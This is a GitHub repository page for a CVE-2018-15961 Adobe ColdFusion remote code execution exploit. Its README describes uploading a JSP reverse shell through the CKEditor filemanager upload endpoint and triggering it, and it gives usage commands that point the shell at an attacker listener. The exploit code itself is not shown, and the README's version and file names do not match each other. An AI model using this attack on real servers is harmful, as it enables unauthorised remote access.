Skip to content
/ CVE-2018-15961 Public

CVE-2018-15961 — ᴀᴅᴏʙᴇ ᴄᴏʟᴅғᴜsɪᴏɴ (ʀᴄᴇ)

2 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

orangmuda/CVE-2018-15961

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
README.md
README.md
 
 
exploit.py
exploit.py
 
 

Repository files navigation

CVE-2018-15961 - Adobe ColdFusion RCE

This repository contains my exploit code for the RCE vulnerability in Adobe ColdFusion 2021.

Exploit Description

The exploit sends a POST request containing a JSP reverse shell to /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm. If successfull, this uploads the shell to /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell.jsp. The code then triggers to shell by sending a simple GET request.

Usage

# Basic usage
python3 coldfusion_rce.py -u https://172.31.1.15:8500 -l 10.10.0.25 -p 443

# With custom filename for the shell
python3 coldfusion_rce.py -u https://172.31.1.15:8500 -l 10.10.0.25 -p 443 -f reverse.jsp

About

CVE-2018-15961 — ᴀᴅᴏʙᴇ ᴄᴏʟᴅғᴜsɪᴏɴ (ʀᴄᴇ)

Topics

adobe code-injection

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages